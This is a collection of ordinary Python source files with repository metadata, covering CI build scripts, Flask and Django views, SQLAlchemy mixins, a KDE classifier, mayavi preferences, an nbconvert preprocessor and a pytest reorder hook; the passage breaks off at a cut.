        # - create dist/ path to circumvent permission errors
        if self.os == self.LINUX:
            self.run("docker build -t 32-bit-linux -f Dockerfilei386 .")
        for arch, python in self.python:
            self.run(f"{python} -m pip install setuptools")
            self.run(f"{python} -m pip install pyinstaller")
            self.run(f"{python} -m pip install pytest")
            self.run(f"{python} -m pip install -e .")

    def dist(self):
        """Runs Pyinstaller producing a binary for every platform arch."""
        for arch, python in self.python:
            # Build the binary
            build_path = os.path.join("dist", f"safety-{arch}")
            self.run(f"{python} -m PyInstaller safety.spec"
                     f" --distpath {build_path}")
            # There seems to be no way to tell pyinstaller the binary name.
            # This leads to problems with appveyors artifact collector because
            # every binary is named the same.
            #
            # Move them around so they can be picked up correctly
            #
            artifact_path = os.path.join(
                os.getcwd(),
                "dist",
                f"safety-{self.os}-{'i686' if arch == 32 else 'x86_64'}"
            )
            binary_path = os.path.join(os.getcwd(), build_path, "safety")
            if self.os == self.WIN:
                self.run(f"move {binary_path}.exe {artifact_path}.exe")
            else:
                self.run(f"cp {binary_path} {artifact_path}")

    def test(self):
        """
        Runs tests for every available arch on the current platform.
        """
        for arch, python in self.python:
            self.run(f"{python} -m pytest")
if __name__ == "__main__":
    # Dispatch to environment.install / .test / .dist by name.
    valid_actions = ('install', 'test', 'dist')
    if len(sys.argv) < 2 or sys.argv[1] not in valid_actions:
        print("usage: appveyor.py [install|test|dist]")
        sys.exit(-1)
    env = environment()
    # Runs the command in sys.argv[1] (install|test|dist)
    getattr(env, sys.argv[1])()
    sys.exit(0)
| {
"repo_name": "pyupio/safety",
"path": "appveyor.py",
"copies": "1",
"size": "4119",
"license": "mit",
"hash": -3246465745565662000,
"line_mean": 30.9302325581,
"line_max": 79,
"alpha_frac": 0.5518329692,
"autogenerated": false,
"ratio": 3.9191246431969553,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9970957612396956,
"avg_score": 0,
"num_lines": 129
} |
from contextlib import closing
import os
import subprocess
import tempfile
import yaml
# Message raised when appveyor.yml contains a step that is not a
# powershell ("ps") entry.
_POWERSHELL_ONLY_ERROR = ("""appveyor-container-runner only works with """
                          """powershell commands.""")
def main():
    """Run the powershell commands from the repo's appveyor.yml.

    Collects the ``ps`` entries from each known build section, writes them
    to ``build-script.ps1`` in the current working directory, and executes
    that script with powershell. Returns the subprocess exit status.

    Raises:
        RuntimeError: if any section entry is not a powershell (``ps``) step.
        subprocess.CalledProcessError: if powershell exits non-zero.
    """
    with open("appveyor.yml", "r") as yaml_file:
        # safe_load: appveyor.yml is plain data, and yaml.load without an
        # explicit Loader is rejected by modern PyYAML (>= 6).
        appveyor_yaml = yaml.safe_load(yaml_file.read())
    commands = []
    for section in ["install",
                    "before_build",
                    "after_build",
                    "before_test",
                    "test_script",
                    "after_test",
                    "on_finish"]:
        section_list = appveyor_yaml.get(section)
        if section_list is None:
            # Missing sections are simply skipped.
            continue
        try:
            commands += [i["ps"] for i in section_list]
        except KeyError:
            # An entry without a "ps" key is a non-powershell step.
            raise RuntimeError(_POWERSHELL_ONLY_ERROR)
    script_file_name = os.path.join(os.getcwd(), "build-script.ps1")
    with open(script_file_name, "wt") as script_file:
        for command in commands:
            script_file.write("{0}\n".format(command))
    os.environ["APPVEYOR"] = "1"
    return subprocess.check_call(["powershell",
                                  "-ExecutionPolicy",
                                  "Bypass",
                                  os.path.basename(script_file_name)],
                                 env=os.environ)
| {
"repo_name": "smspillaz/appveyor-container-runner",
"path": "appveyorcontainerrunner/runner.py",
"copies": "1",
"size": "1735",
"license": "mit",
"hash": -5167724052448867000,
"line_mean": 29.4385964912,
"line_max": 74,
"alpha_frac": 0.4933717579,
"autogenerated": false,
"ratio": 4.530026109660574,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5523397867560574,
"avg_score": null,
"num_lines": null
} |
"""App view decorators."""
from functools import wraps
from flask import (
abort,
request,
)
def require_headers(headers=[]):
    """Check for required headers in a view.

    @require_headers(headers=['X-Foo'])
    def view():
        pass
    """
    def outer(func, *args, **kwargs):
        @wraps(func)
        def inner(*args, **kwargs):
            if headers:
                required = set(headers)
                present = {name for name, _ in request.headers}
                missing = required - present
                if missing:
                    raise ValueError(
                        'Missing required header(s): {}'.format(list(missing)))
            return func(*args, **kwargs)
        return inner
    return outer
def require_cookies(cookies=[]):
    """Check for required cookies in a view.

    @require_cookies(cookies=['csrftoken', 'session'])
    def view():
        pass
    """
    def outer(func, *args, **kwargs):
        @wraps(func)
        def inner(*args, **kwargs):
            if cookies:
                required = set(cookies)
                present = {key for key, _ in request.cookies.items()}
                missing = required - present
                if missing:
                    raise ValueError(
                        'Missing required cookie(s): {}'.format(list(missing)))
            return func(*args, **kwargs)
        return inner
    return outer
def require_args(params=[]):
    """Check for required args (and values) in a view.

    @require_args(params=['paginate'])
    def view():
        pass

    or, if you want to check both key and value:

    @require_args(params={'paginate': True})
    def view():
        pass
    """
    def outer(func, *args, **kwargs):
        @wraps(func)
        def inner(*args, **kwargs):
            if params:
                if isinstance(params, list):
                    # List form: only the presence of each key matters.
                    required = set(params)
                    present = {key for key, _ in request.args.items()}
                    missing = required - present
                    if missing:
                        raise ValueError(
                            'Missing required arg(s): {}'.format(list(missing)))
                else:
                    # Dict form: each key must exist AND match its value.
                    for param, expected in params.items():
                        actual = request.args.get(param)
                        if actual is None:
                            raise ValueError(
                                'Missing param `{}`'.format(param))
                        if actual != expected:
                            raise ValueError(
                                'Invalid value `{}` '
                                'for param {}.'.format(actual, param))
            return func(*args, **kwargs)
        return inner
    return outer
def require_form(values=[]):
    """Check for required form values.

    @require_form(values=['name', 'address'])
    def view():
        pass
    """
    def outer(func, *args, **kwargs):
        @wraps(func)
        def inner(*args, **kwargs):
            # Only POSTs carry form data worth validating.
            if request.method == 'POST' and values:
                required = set(values)
                present = {key for key, _ in request.form.items()}
                missing = required - present
                if missing:
                    raise ValueError(
                        'Missing required form '
                        'field(s): {}'.format(list(missing)))
            return func(*args, **kwargs)
        return inner
    return outer
def xhr_only(status_code=415):
    """Reject any request that is not an XHR (AJAX) request.

    @xhr_only()
    def view():
        pass
    """
    def outer(func, *args, **kwargs):
        @wraps(func)
        def inner(*args, **kwargs):
            if request.is_xhr:
                return func(*args, **kwargs)
            # Default to status "unsupported media type".
            abort(status_code)
        return inner
    return outer
| {
"repo_name": "christabor/jinja2_template_pack",
"path": "flask_extras/decorators.py",
"copies": "2",
"size": "4116",
"license": "mit",
"hash": -8965912037198929000,
"line_mean": 29.2647058824,
"line_max": 77,
"alpha_frac": 0.4679300292,
"autogenerated": false,
"ratio": 4.478781284004352,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0,
"num_lines": 136
} |
# app/views/admin.py
from flask import flash, current_app, Flask, render_template, request, redirect, url_for, Blueprint
from .forms import AdminUserForm, AdminRoleForm
from ..models import *
# This is the view that shows the admin dashboard.
# Blueprint grouping all admin views under the /admin URL prefix.
admin = Blueprint('admin', __name__, url_prefix='/admin')

@admin.route('/index')
@admin.route('/dashboard')
def dashboard():
    """Render the admin dashboard landing page."""
    # Should show stats ( # New, # Updated, # Flagged For Deletion, Etc) for Users, Roles, Stores and Products, etc
    return render_template('admin/dashboard.html', view_name='dashboard')
@admin.route('/users')
def users():
    """List every user for the admin users table."""
    all_users = User.query.all()
    return render_template('admin/users.html', view_name='users',
                           users=all_users)
@admin.route('/user/', methods=['GET', 'POST'])
def add_user():
    """Create a new user: GET shows the form, POST redirects to the list.

    Fixes unreachable code in the original, which returned the redirect
    unconditionally so the render_template line could never execute.
    """
    form = AdminUserForm()
    # TODO(review): validate and persist the submitted form before redirecting.
    if request.method == 'POST':
        return redirect(url_for('admin.users'))
    return render_template('admin/edit_user.html', action='create', form=form)
@admin.route('/user/edit/<int:id>', methods=['GET', 'POST'])
def edit_user(id):
    """Edit the user identified by ``id``: GET shows the form, POST redirects.

    Fixes unreachable code in the original, which returned the redirect
    unconditionally so the render_template line could never execute.
    """
    form = AdminUserForm()
    # TODO(review): load user ``id`` into the form and save changes on POST.
    if request.method == 'POST':
        return redirect(url_for('admin.users'))
    return render_template('admin/edit_user.html', action='edit', form=form)
@admin.route('/role')
def roles():
    """List every role for the admin roles table."""
    role_list = Role.query.all()
    return render_template('admin/roles.html', view_name='roles',
                           roles=role_list)
@admin.route('/role/add')
def add_role():
    """Placeholder view for creating a role.

    Fixes two defects: the original route '/role' collided with the
    ``roles`` view, and the template was handed the global name ``roles``
    (the view function itself) instead of query results.
    """
    roles = Role.query.all()
    return render_template('admin/roles.html', view_name='roles', roles=roles)
@admin.route('/role/edit/<int:id>')
def edit_role(id):
    """Placeholder view for editing role ``id``.

    Fixes the original route '/role', which carried no ``<int:id>``
    variable so this view could never receive its ``id`` argument, and the
    undefined-local ``roles`` passed to the template.
    """
    roles = Role.query.all()
    return render_template('admin/roles.html', view_name='roles', roles=roles)
# Dashboard should include standard tools
# User administration
# User creation/deletion/permissions editing
#
# More stuff
# Much lower priority
| {
"repo_name": "jacobsky/shopping-aggregator",
"path": "shopping-aggregator/app/views/admin.py",
"copies": "1",
"size": "1726",
"license": "apache-2.0",
"hash": 1032525592355368600,
"line_mean": 31.5660377358,
"line_max": 112,
"alpha_frac": 0.7201622248,
"autogenerated": false,
"ratio": 3.2813688212927756,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.941442862204902,
"avg_score": 0.01742048480875109,
"num_lines": 53
} |
"""App views."""
from __future__ import unicode_literals
from django.shortcuts import render, redirect
from django.http import HttpResponse
from game_app.models import GameModel
from game_app.clean_files import config_section_map, change_settings
from game_app.forms import GameForm, UploadForm
def home_view(request):
    """Home view: show the game picker, or redirect to the settings form
    for the chosen game on POST."""
    if request.method == 'POST':
        game_form = GameForm(request.POST)
        return redirect('/generateform/{}'.format(game_form.data['games']))
    game_form = GameForm()
    upload_form = UploadForm()
    return render(request, 'home.html',
                  context={'form': game_form, 'upload_form': upload_form})
def upload_view(request):
    """Upload file."""
    # NOTE(review): the form is saved without calling is_valid() — confirm
    # uploads are validated elsewhere or add validation here.
    upload_form = UploadForm(request.POST, request.FILES)
    instance = upload_form.save()
    # Redirect to the settings form generated for the new upload.
    return redirect('/generateform/{}'.format(instance.id))
def generate_form(request, **kwargs):
    """Generate form based on game file settings.

    GET renders the parsed settings; POST rewrites the .ini with the
    submitted values and streams it back as an attachment.
    """
    file_id = kwargs.get('file_id')
    # NOTE(review): ``file`` is None when no GameModel matches file_id —
    # the attribute access below would then raise; confirm callers
    # guarantee a valid id.
    file = GameModel.objects.filter(id=file_id).first()
    parsed_file, section = config_section_map(file.ini_file.file)
    if request.method == 'GET':
        return render(request, 'home.html', context={'parsed_file': parsed_file})
    form_data = request.POST
    copy = file.ini_file.file
    # change_settings returns a temp file with the updated settings.
    temp = change_settings(section, form_data, copy)
    temp.seek(0)
    response = HttpResponse(temp, content_type='text/plain')
    response['Content-Disposition'] = 'attachment; filename={}.ini'.format(file.title)
    temp.close()
    return response
| {
"repo_name": "flegald/Gameini",
"path": "gameini/game_app/views.py",
"copies": "1",
"size": "1534",
"license": "mpl-2.0",
"hash": 286430785679483620,
"line_mean": 34.6744186047,
"line_max": 95,
"alpha_frac": 0.6799217731,
"autogenerated": false,
"ratio": 3.797029702970297,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.985670658752478,
"avg_score": 0.024048977709103473,
"num_lines": 43
} |
# app.views.py
#
# Views for dynamic content
import logging, urllib
from django.shortcuts import render
from yacon.models.pages import Page, PageType, Block
logger = logging.getLogger(__name__)

# ============================================================================

# Module-level cache for the 'News Type' PageType; populated lazily on the
# first request so the query does not run at import time.
NEWS_PAGE_TYPE = None

# ============================================================================
# Dynamic Views
# ============================================================================

def news_listing(request, data):
    """Render the news listing, or search results when ``?q=`` is supplied.

    ``data`` is a template-context dict prepared by the caller; it is
    updated in place before rendering.
    """
    global NEWS_PAGE_TYPE
    search = request.GET.get('q')
    if search:
        # Python 2 urllib: search terms arrive URL-encoded.
        search = urllib.unquote(search)
        blocks = Block.search(search, block_key='news', highlighted=True)
        data.update({
            'search':True,
            'search_terms':search,
            'blocks':blocks,
        })
    else:
        # find all of the blogs in the system and list them
        if not NEWS_PAGE_TYPE:
            NEWS_PAGE_TYPE = PageType.objects.get(name='News Type')

        # return all possible news items
        news_items = Page.find_by_page_type(NEWS_PAGE_TYPE).order_by('-created')

        # return entire listing, summarization will be done by template tag on
        # the page
        data.update({
            'news_items':news_items,
        })

    return render(request, 'news_listing.html', data)
| {
"repo_name": "cltrudeau/django-yacon",
"path": "extras/sample_site/app/views.py",
"copies": "1",
"size": "1338",
"license": "mit",
"hash": -5604780758358374000,
"line_mean": 28.7333333333,
"line_max": 80,
"alpha_frac": 0.5119581465,
"autogenerated": false,
"ratio": 4.316129032258065,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.004738782698691633,
"num_lines": 45
} |
"""App-wide DB definitions
"""
# Ben Peters (bencpeters@gmail.com)
import json
from datetime import datetime
from sqlalchemy.types import TypeDecorator, VARCHAR
from sqlalchemy.orm import sessionmaker, scoped_session, relationship
from sqlalchemy.ext.declarative import declarative_base, declared_attr
from sqlalchemy import (
ForeignKey, Column, DateTime, Integer, Float, Unicode
)
from sqlalchemy.sql.expression import func
from home_controller.log import logger
class Base(object):
    """Mixin to augment the declarative base with logging & other common model
    functionality
    """
    @property
    def log(self):
        # Shared module-level logger imported from home_controller.log.
        return logger

# Rebind: from here on ``Base`` is the SQLAlchemy declarative base built on
# top of the mixin defined above.
Base = declarative_base(cls=Base)
class Timestamps(object):
    """Mixin for adding TimeStamp columns to a model
    """
    # Set once when the row is inserted.
    created_at = Column(DateTime, default=func.now())
    # Set on insert AND refreshed on every UPDATE. The original only gave a
    # ``default``, so updated_at never changed after the initial insert.
    updated_at = Column(DateTime, default=func.now(), onupdate=func.now())
class UniqueId(object):
    """Mixin for adding a unique id column to a model
    """
    # Integer surrogate primary key.
    id = Column(Integer, primary_key=True, nullable=False)
class JSONEncodedDict(TypeDecorator):
    """Represents an immutable structure as a json-encoded string.

    Recipe from
    http://docs.sqlalchemy.org/en/rel_0_9/core/custom_types.html#marshal-json-strings

    Usage::

        JSONEncodedDict(255)
    """

    impl = VARCHAR

    def process_bind_param(self, value, dialect):
        # Python value -> JSON text on the way into the database.
        if value is None:
            return None
        return json.dumps(value)

    def process_result_value(self, value, dialect):
        # JSON text -> Python value on the way out of the database.
        if value is None:
            return None
        return json.loads(value)
# Thread-local session registry: each thread gets its own Session object
# through the scoped_session proxy.
session_factory = sessionmaker()
Session = scoped_session(session_factory)
class BaseType(object):
    """Mixin for a class that is intended to be the base class for a wide
    variety of inherited types.
    """
    @declared_attr
    def type_(cls):
        # Discriminator column used by the polymorphic mapper below.
        return Column(Integer, nullable=False)

    # Free-form JSON blob of per-instance attributes.
    attributes = Column(JSONEncodedDict)

    __mapper_args__ = {
        "polymorphic_on": type_
    }

    @property
    def type_string(self):
        """Accessor for the string type name
        """
        # NOTE(review): relies on subclasses providing a ``types`` enum-like
        # callable and a ``type`` attribute; the column declared here is
        # named ``type_`` — confirm ``self.type`` exists on subclasses.
        if getattr(self, "types", None) is not None:
            return self.types(self.type).name
class _DataCollection(UniqueId):
    """Base class that gets used for dynamically created classes in
    HasFloatDataCollection mixin. This is the collection of values that is
    linked with the parent class.
    """
    timestamp = Column(DateTime)

    def __init__(self, parent, values):
        """Store ``values`` against ``parent``.

        ``values`` may be a sequence or a single scalar; scalars are
        wrapped in a one-element list.
        """
        try:
            len(values)
        except TypeError:
            # Scalar (no __len__): wrap it. Narrowed from a bare ``except``
            # so unrelated errors (e.g. KeyboardInterrupt) still propagate.
            self.values = [values]
        else:
            self.values = values
        self.parent = parent
class _DataCollectionValues(UniqueId):
    """Row type for the dynamically created value classes in
    HasFloatDataCollection: one named float per instance, linked to its
    parent record.
    """
    value = Column(Float)
    name = Column(Unicode(20), nullable=False)

    def __init__(self, value, name, record=None):
        self.record = record
        self.name = name
        self.value = value
class HasFloatDataCollection(object):
    """Mixin to add data collection tables & relationships.

    Hosts must define ``data_table_name`` (snake_case); two table classes
    are generated from it at mapper-configuration time.
    """
    @declared_attr
    def data(cls):
        # Build CamelCase class names from the snake_case table name.
        make_cls_name = lambda n: "".join(
            [s.capitalize() for s in cls.data_table_name.split("_")]) + n
        # One row per recorded sample set, FK'd back to the host model.
        collection = type(make_cls_name("Collection"),
            (_DataCollection, Base), {
            "__tablename__": cls.data_table_name,
            "values": relationship(make_cls_name("CollectionValues"),
                backref="record"),
            "parent_id": Column(Integer,
                ForeignKey("{}.id".format(cls.__tablename__)),
                nullable=False),
        })
        # One row per named float value within a sample set.
        values = type(make_cls_name("CollectionValues"),
            (_DataCollectionValues, Base), {
            "__tablename__": cls.data_table_name + "_values",
            "record_id": Column(Integer,
                ForeignKey("{}.id".format(cls.data_table_name)),
                nullable=False),
        })
        # Expose the generated classes on the host class for later use.
        cls.record_type = collection
        cls.value_type = values
        return relationship(collection, backref="parent")

    def _update_data(self, data):
        """Helper function to update the DB with new data values

        Create our own session so that we're threadsafe
        """
        session = Session()
        session.add(self.record_type(self, data))
        try:
            # Best-effort: hosts without a ``last_update`` attribute are fine.
            self.last_update = datetime.utcnow()
        except AttributeError:
            pass
        session.commit()
        self._latest_data = data
        try:
            # Best-effort logging; ``name`` may be absent on some hosts.
            self.log.debug("Updated data for {cls_name} {name}".format(
                cls_name=self.__class__.__name__,
                name=self.name,
            ))
        except AttributeError:
            pass
| {
"repo_name": "bencpeters/home-controls",
"path": "home_controller/db.py",
"copies": "1",
"size": "4910",
"license": "mit",
"hash": -8556316691214224000,
"line_mean": 28.4011976048,
"line_max": 85,
"alpha_frac": 0.6099796334,
"autogenerated": false,
"ratio": 4.383928571428571,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5493908204828571,
"avg_score": null,
"num_lines": null
} |
"""A predictor that uses KDE to classify instances."""
import numpy
import sklearn.base
import sklearn.neighbors
import sklearn.utils.multiclass
import sklearn.utils.validation
class KDEClassifier(sklearn.base.BaseEstimator, sklearn.base.ClassifierMixin):
    """Classifier that models each class with a kernel density estimate."""

    def __init__(self, bandwidth=1.0):
        """A classifier using kernel density estimation to classify instances.

        One kernel density estimate is fitted per class; instances are
        labelled with the class whose estimate scores them highest.

        bandwidth : float
            Bandwidth for the kernel density estimate.
        """
        self.bandwidth = bandwidth

    def fit(self, X, y):
        """Fit one kernel density model per class.

        Parameters
        ----------
        X : array_like, shape (n_samples, n_features)
            List of n_features-dimensional data points. Each row
            corresponds to a single data point.
        y : array-like, shape (n_samples,)
            Target vector relative to X.
        """
        X, y = sklearn.utils.validation.check_X_y(X, y)
        self.classes_ = sklearn.utils.multiclass.unique_labels(y)
        self.kdes_ = [
            sklearn.neighbors.KernelDensity(self.bandwidth).fit(X[y == label])
            for label in self.classes_]
        return self

    def predict(self, X):
        """Predict the most probable class label for each instance.

        Parameters
        ----------
        X : array_like, shape (n_samples, n_features)
            List of n_features-dimensional data points. Each row
            corresponds to a single data point.
        """
        sklearn.utils.validation.check_is_fitted(self, ['kdes_', 'classes_'])
        X = sklearn.utils.validation.check_array(X)
        probabilities = self.predict_proba(X)
        best = probabilities.argmax(axis=1)
        assert best.shape[0] == X.shape[0]
        return numpy.array([self.classes_[idx] for idx in best])

    @staticmethod
    def _softmax(data, axis=0):
        """Numerically stable softmax of an array along an axis.

        Notes
        -----
        Adapted from https://gist.github.com/stober/1946926.

        Parameters
        ----------
        data : array_like
            Array of numbers.
        axis : int
            Axis to softmax along.
        """
        shifted = data - numpy.expand_dims(numpy.max(data, axis=axis), axis)
        exps = numpy.exp(shifted)
        return exps / numpy.expand_dims(exps.sum(axis=axis), axis)

    def predict_proba(self, X):
        """Predict class probabilities.

        Class probabilities are the softmax-normalised log densities of the
        per-class kernel density estimates.

        Parameters
        ----------
        X : array_like, shape (n_samples, n_features)
            List of n_features-dimensional data points. Each row
            corresponds to a single data point.
        """
        sklearn.utils.validation.check_is_fitted(self, ['kdes_', 'classes_'])
        X = sklearn.utils.validation.check_array(X)
        log_densities = numpy.zeros((X.shape[0], len(self.classes_)))
        for column, kde in enumerate(self.kdes_):
            log_densities[:, column] = kde.score_samples(X)
        probabilities = self._softmax(log_densities, axis=1)
        assert probabilities.shape == (X.shape[0], len(self.classes_))
        assert numpy.allclose(probabilities.sum(axis=1),
                              numpy.ones((X.shape[0],)))
        return probabilities
| {
"repo_name": "chengsoonong/acton",
"path": "acton/kde_predictor.py",
"copies": "1",
"size": "3519",
"license": "bsd-3-clause",
"hash": 3447067531607300600,
"line_mean": 31.2844036697,
"line_max": 80,
"alpha_frac": 0.6027280477,
"autogenerated": false,
"ratio": 4.174377224199288,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5277105271899288,
"avg_score": null,
"num_lines": null
} |
"""A preference manager for all mayavi related preferences.
The idea behind this module is that it lets the mayavi
library/application use the same preferences by managing them no matter
if mayavi is used as an application (via envisage3) or as a library.
The preferences helpers are divided into different categories for
different kinds of preferences. Currently the following are available.
- root: for global mayavi preferences of the form
'mayavi.preference'.
For more details on the general preferences support in enthought, please
read the documentation for apptools.preferences (part of the AppTools
package).
"""
# Author: Prabhu Ramachandran <prabhu [at] aero . iitb . ac . in>
# Copyright (c) 2008, Enthought, Inc.
# License: BSD Style.
# Standard library imports
from os.path import join
import pkg_resources
# Enthought library imports.
from traits.etsconfig.api import ETSConfig
from traits.api import HasTraits, Instance
from traitsui.api import View, Group, Item
from apptools.preferences.api import (ScopedPreferences, IPreferences,
PreferencesHelper)
# Local imports.
from mayavi.preferences.preferences_helpers import (
RootPreferencesHelper, MlabPreferencesHelper )
# The application ID where the preferences are stored.
ID = 'mayavi_e3'
################################################################################
# `PreferenceManager` class
################################################################################
class PreferenceManager(HasTraits):
    """Bundles the preference store with the helpers that expose it, so
    mayavi shares one set of preferences whether it runs as an Envisage
    application or as a plain library.
    """

    # The root preferences helper for preferences of the form
    # 'mayavi.preference'.
    root = Instance(PreferencesHelper)

    # The mlab preferences helper for preferences of the form
    # 'mayavi.mlab.preference'.
    mlab = Instance(PreferencesHelper)

    # The preferences.
    preferences = Instance(IPreferences)

    ######################################################################
    # Traits UI view.
    traits_view = View(Group(
                        Group(Item(name='root', style='custom'),
                              show_labels=False, label='Root',
                              show_border=True
                             ),
                        Group(Item(name='mlab', style='custom'),
                              show_labels=False, label='Mlab',
                              show_border=True,
                             ),
                       ),
                       buttons=['OK', 'Cancel'],
                       resizable=True
                      )

    ######################################################################
    # `HasTraits` interface.
    ######################################################################
    def __init__(self, **traits):
        super(PreferenceManager, self).__init__(**traits)
        if 'preferences' not in traits:
            self._load_preferences()

    def _preferences_default(self):
        """Trait initializer."""
        return ScopedPreferences()

    def _root_default(self):
        """Trait initializer."""
        return RootPreferencesHelper(preferences=self.preferences)

    def _mlab_default(self):
        """Trait initializer."""
        return MlabPreferencesHelper(preferences=self.preferences)

    ######################################################################
    # Private interface.
    ######################################################################
    def _load_preferences(self):
        """Load the default preferences shipped with mayavi/tvtk into the
        'default' preference scope."""
        # Save current application_home.
        app_home = ETSConfig.get_application_home()
        # Temporarily point application_home at mayavi's own data dir while
        # the bundled preference files are loaded.
        path = join(ETSConfig.get_application_data(), ID)
        ETSConfig.application_home = path
        try:
            for pkg in ('mayavi.preferences',
                        'tvtk.plugins.scene'):
                pref = 'preferences.ini'
                pref_file = pkg_resources.resource_stream(pkg, pref)

                preferences = self.preferences
                default = preferences.node('default/')
                default.load(pref_file)

                pref_file.close()
        finally:
            # Set back the application home.
            ETSConfig.application_home = app_home

    def _preferences_changed(self, preferences):
        """Setup the helpers if the preferences trait changes."""
        # Bug fix: the mlab helper was previously left pointing at the old
        # preferences object; keep every helper in sync.
        for helper in (self.root, self.mlab):
            helper.preferences = preferences
##########################################################
# A global preference manager instance that all other modules share, so
# library and application use see the same preferences.
preference_manager = PreferenceManager()
| {
"repo_name": "alexandreleroux/mayavi",
"path": "mayavi/preferences/preference_manager.py",
"copies": "5",
"size": "4651",
"license": "bsd-3-clause",
"hash": -4791921345028933000,
"line_mean": 35.0542635659,
"line_max": 80,
"alpha_frac": 0.5452590841,
"autogenerated": false,
"ratio": 5.156319290465632,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.009137362302736981,
"num_lines": 129
} |
"""A preprocessor that extracts all of the outputs from the
notebook file. The extracted outputs are returned in the 'resources' dictionary.
"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from binascii import a2b_base64
import sys
import os
from mimetypes import guess_extension
from traitlets import Unicode, Set
from .base import Preprocessor
def guess_extension_without_jpe(mimetype):
    """Map a MIME type to a file extension, avoiding the '.jpe' form.

    mimetypes.guess_extension can return '.jpe' for jpeg images on some
    platforms, which latex does not recognise; that result is normalised
    to '.jpeg'. Every other case behaves exactly like
    mimetypes.guess_extension (including returning None for unknown types).
    """
    ext = guess_extension(mimetype)
    return ".jpeg" if ext == ".jpe" else ext
class ExtractOutputPreprocessor(Preprocessor):
    """
    Extracts all of the outputs from the notebook file. The extracted
    outputs are returned in the 'resources' dictionary.
    """

    # Template for the extracted file names; extension includes the dot.
    output_filename_template = Unicode(
        "{unique_key}_{cell_index}_{index}{extension}"
    ).tag(config=True)

    # MIME types that are pulled out of cell outputs into separate files.
    extract_output_types = Set(
        {'image/png', 'image/jpeg', 'image/svg+xml', 'application/pdf'}
    ).tag(config=True)

    def preprocess_cell(self, cell, resources, cell_index):
        """
        Apply a transformation on each cell,

        Parameters
        ----------
        cell : NotebookNode cell
            Notebook cell being processed
        resources : dictionary
            Additional resources used in the conversion process.  Allows
            preprocessors to pass variables into the Jinja engine.
        cell_index : int
            Index of the cell being processed (see base.py)
        """

        #Get the unique key from the resource dict if it exists. If it does not
        #exist, use 'output' as the default.  Also, get files directory if it
        #has been specified
        unique_key = resources.get('unique_key', 'output')
        output_files_dir = resources.get('output_files_dir', None)

        #Make sure outputs key exists
        if not isinstance(resources['outputs'], dict):
            resources['outputs'] = {}

        #Loop through all of the outputs in the cell
        for index, out in enumerate(cell.get('outputs', [])):
            if out.output_type not in {'display_data', 'execute_result'}:
                continue
            #Get the output in data formats that the template needs extracted
            for mime_type in self.extract_output_types:
                if mime_type in out.data:
                    data = out.data[mime_type]

                    #Binary files are base64-encoded, SVG is already XML
                    if mime_type in {'image/png', 'image/jpeg', 'application/pdf'}:
                        # data is b64-encoded as text (str, unicode),
                        # we want the original bytes
                        data = a2b_base64(data)
                    elif sys.platform == 'win32':
                        # NOTE(review): text outputs get CRLF line endings on
                        # Windows before encoding — confirm this is still
                        # desired for all text MIME types.
                        data = data.replace('\n', '\r\n').encode("UTF-8")
                    else:
                        data = data.encode("UTF-8")

                    ext = guess_extension_without_jpe(mime_type)
                    if ext is None:
                        # Unknown MIME type: fall back to its subtype name.
                        ext = '.' + mime_type.rsplit('/')[-1]

                    filename = self.output_filename_template.format(
                                    unique_key=unique_key,
                                    cell_index=cell_index,
                                    index=index,
                                    extension=ext)

                    # On the cell, make the figure available via
                    #   cell.outputs[i].metadata.filenames['mime/type']
                    # where
                    #   cell.outputs[i].data['mime/type'] contains the data
                    if output_files_dir is not None:
                        filename = os.path.join(output_files_dir, filename)
                    out.metadata.setdefault('filenames', {})
                    out.metadata['filenames'][mime_type] = filename

                    #In the resources, make the figure available via
                    #   resources['outputs']['filename'] = data
                    resources['outputs'][filename] = data

        return cell, resources
| {
"repo_name": "ammarkhann/FinalSeniorCode",
"path": "lib/python2.7/site-packages/nbconvert/preprocessors/extractoutput.py",
"copies": "8",
"size": "4365",
"license": "mit",
"hash": 2131991370487359700,
"line_mean": 39.0458715596,
"line_max": 83,
"alpha_frac": 0.5541809851,
"autogenerated": false,
"ratio": 4.786184210526316,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9340365195626316,
"avg_score": null,
"num_lines": null
} |
"""A pre-specified hook to reorder test functions and its building blocks."""
import re
# Default regular expressions match varying paths - for example the unit tests re matches:
# tests/unit/...
# test_unit.py
# app/tests/unit/....
# tests/test_unit
# unit
# But won't match (e.g.):
# some_unit
# abc_test_unit
# Default collection order: unit tests first, then anything unmatched,
# then integration tests, then UI tests.
DEFAULT_ORDER = (
    r'(^|.*/)(test_)?unit',
    None,  # None - no match: position of tests not matching any regex.
    r'(^|.*/)(test_)?integration',
    r'(^|.*/)(test_)?ui',
)
class PytestReorderError(Exception):
    """Base error raised when a reorder hook is requested with invalid arguments."""
class EmptyTestsOrderList(PytestReorderError):
    """Signals that an empty list was supplied as the tests-order specification."""
class UndefinedUnmatchedTestsOrder(PytestReorderError):
    """Signals an ordering list that lacks the None entry placing unmatched tests."""
def unpack_test_ordering(ordering):
    """
    Split an ordering spec into compiled matchers and the unmatched-tests position.

    Each non-None entry of ``ordering`` is a regular expression string matching
    test nodeids; its index in the list is the rank tests matching it receive.
    The single ``None`` entry marks the rank given to tests matching nothing,
    e.g. ``['a.*', 'b.*', None, 'k.*']`` yields matchers ranked 0, 1 and 3 with
    unmatched tests ranked 2.

    :param list ordering: re strings (in desired order) plus one ``None``.
    :raise EmptyTestsOrderList: if ``ordering`` is empty
    :raise UndefinedUnmatchedTestsOrder: if ``ordering`` contains no ``None``
    :rtype: tuple
    :return: ``(matchers, unmatched_position)`` where ``matchers`` is a list of
        ``(compiled_regex, position)`` pairs and ``unmatched_position`` is the
        int rank of tests that match none of the regexes.
    """
    if not ordering:
        raise EmptyTestsOrderList('The ordering list is empty.')
    try:
        unmatched_position = ordering.index(None)
    except ValueError:
